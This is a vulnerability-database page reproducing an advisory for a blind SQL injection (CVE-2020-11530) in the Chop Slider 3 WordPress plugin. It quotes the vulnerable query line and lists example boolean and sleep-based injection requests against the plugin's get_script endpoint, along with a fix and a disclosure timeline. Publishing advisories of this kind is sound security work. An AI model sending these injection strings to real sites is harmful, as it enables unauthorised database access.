| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| WordPress ChopSlider 3 SQL Injection Vulnerability | 9 May 202000:00 | – | zdt | |
| CVE-2020-11530 | 8 May 202000:00 | – | attackerkb | |
| CVE-2020-11530 | 18 Feb 202111:04 | – | circl | |
| WordPress Chop Slider SQL Injection Vulnerability | 11 May 202000:00 | – | cnvd | |
| SQL Injection Over HTTP Traffic (CVE-2020-11530; CVE-2020-17463; CVE-2020-17506; CVE-2020-25990; CVE-2020-27481; CVE-2020-5766; CVE-2020-8655; CVE-2020-8656; CVE-2020-9465) | 18 Nov 202000:00 | – | checkpoint_advisories | |
| CVE-2020-11530 | 8 May 202019:10 | – | cve | |
| CVE-2020-11530 | 8 May 202019:10 | – | cvelist | |
| WordPress Chop Slider 3 SQL Injection | 5 Jun 202000:00 | – | dsquare | |
| WordPress ChopSlider3 id SQLi Scanner | 18 Feb 202117:42 | – | metasploit | |
| WordPress Chop Slider 3 - Blind SQL Injection | 6 Jun 202603:01 | – | nuclei |
`----------------------------------------------------------------
ChopSlider3 Wordpress Plugin SQL Injection
----------------------------------------------------------------
[-] Software Link:
https://idangero.us/
https://github.com/idangerous/Plugins
[-] Affected Versions:
ChopSlider version 3.
[-] Vulnerability Description:
A blind SQL injection vulnerability is present in Chop Slider 3, a
Wordpress plugin. The vulnerability is introduced in
'chopslider/get_script/index.php', and allows an attacker to execute
arbitrary SQL queries in the context of the WP database user.
The offending code is located on line 13 of
'chopslider/get_script/index.php':
$cs_result = $wpdb->get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '
WHERE chopslider_id =' . $id);
Example injection string:
GET /wp-content/plugins/chopslider/get_script/?id=141217078 or 6702=6702
(returns content-length 3055]
GET /wp-content/plugins/chopslider/get_script/?id=141217078 or 6702=6703
(returns content-length 1229]
Blind delay-based SQL injection:
GET /wp-content/plugins/chopslider/get_script/?id=141217078 or (SELECT
sleep(10))=6312 [delays for 10 seconds]
[-] Solution:
Use of prepared statements with parameterized queries will fix this
vulnerability.
[-] Disclosure Timeline:
[03/04/2020] - Issue reported to vendor. No response was received.
[04/04/2020] - CVE number assigned.
[07/05/2020] - Publication of this advisory.
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2020-11530 to this vulnerability.
[-] Credits:
Vulnerability discovered by Callum Murphy.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation